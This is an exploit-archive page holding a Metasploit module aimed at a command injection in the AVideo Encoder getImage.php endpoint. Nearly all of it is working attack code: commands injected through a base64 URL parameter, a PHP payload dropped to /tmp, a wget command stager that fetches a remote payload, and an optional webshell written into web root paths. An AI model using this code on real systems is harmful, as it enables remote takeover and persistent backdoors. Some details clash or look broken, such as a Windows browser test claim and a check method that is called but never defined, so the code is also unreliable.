Share
## https://sploitus.com/exploit?id=PACKETSTORM:217619
======================================================================================================================
    | # Title     : AVideo versions prior to 7.0 Metasploit Module Command Injection                                     |
    | # Author    : indoushka                                                                                            |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                     |
    | # Vendor    : https://www.avideo.com/                                                                              |
    ======================================================================================================================
    
    [+] Summary    : The Metasploit exploit module targets a command injection vulnerability in AVideo  
    				 This module exploits a base64-encoded command injection flaw in AVideo Encoder’s image processing endpoint, turning a simple URL parameter into remote code execution with multiple payload strategies.
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'AVideo Encoder getImage.php Command Injection',
          'Description'    => %q{
            Command injection in AVideo via base64Url parameter.
          },
          'Author'         => ['indoushka'],
          'License'        => MSF_LICENSE,
          'Platform'       => ['unix', 'linux', 'php'],
          'Arch'           => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
          'Targets'        => [
            ['Unix Command', { 'Type' => :unix_cmd }],
            ['PHP Command',  { 'Type' => :php_cmd }],
            ['Linux Dropper',{ 'Type' => :linux_dropper }]
          ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2020-10-15'
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
          OptString.new('WEBSHELL_NAME', [false, 'Webshell name', 'shell.php']),
          OptBool.new('UPLOAD_WEBSHELL', [false, 'Upload webshell', false])
        ])
    
        register_advanced_options([
          OptInt.new('Delay', [false, 'Delay', 1])
        ])
      end
    
      def execute_command(cmd)
        payload = build_payload(cmd)
    
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, 'Encoder', 'objects', 'getImage.php'),
            'vars_get' => {
              'base64Url' => payload,
              'format'    => 'png'
            },
            'timeout' => datastore['TIMEOUT']
          })
    
          return res&.body
        rescue ::Rex::ConnectionError
          return nil
        end
      end
    
      def build_payload(cmd)
        injected = "http://test.com/`#{cmd}`"
        Rex::Text.encode_base64(injected)
      end
    
      def exploit
        unless datastore['ForceExploit'] || check == Exploit::CheckCode::Vulnerable
          fail_with(Failure::NotVulnerable, 'Target not vulnerable')
        end
    
        print_status("Exploiting...")
    
        case target['Type']
        when :unix_cmd
          execute_command(payload.encoded)  
        when :php_cmd
          execute_php_payload
        when :linux_dropper
          execute_cmdstager
        end
    
        upload_webshell if datastore['UPLOAD_WEBSHELL']
      end
    
      def execute_php_payload
        print_status("Executing PHP payload...")
    
        php_code = "<?php system($_GET['cmd']); ?>"
        tmp_file = "/tmp/#{Rex::Text.rand_text_alpha(6)}.php"
    
        execute_command("echo '#{php_code}' > #{tmp_file}")
        register_file_for_cleanup(tmp_file)
    
        sleep(datastore['Delay'])
        execute_command("php #{tmp_file}")
      end
    
      def execute_cmdstager
        print_status("Running cmdstager...")
    
        super(
          :delay => datastore['Delay'],
          :flavor => :wget,
          :temp   => '/tmp'
        )
      end
    
      def upload_webshell
        print_status("Uploading webshell...")
    
        webshell = datastore['WEBSHELL_NAME']
        code = "<?php system($_GET['cmd']); ?>"
    
        paths = [
          datastore['WritablePath'],
          '/var/www/html/',
          '/var/www/',
          './'
        ]
    
        paths.each do |p|
          next if p.nil? || p.empty?
    
          path = p.end_with?('/') ? p : p + '/'
    
          execute_command("echo '#{code}' > #{path}#{webshell}")
          sleep(datastore['Delay'])
    
          res = execute_command("ls #{path}#{webshell}")
    
          if res && !res.include?("No such file")
            print_good("Webshell likely uploaded: #{path}#{webshell}")
            break
          end
        end
      end
    
      def print_status(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_good(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_error(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_warning(msg)
        super("[AVideo] #{msg}")
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================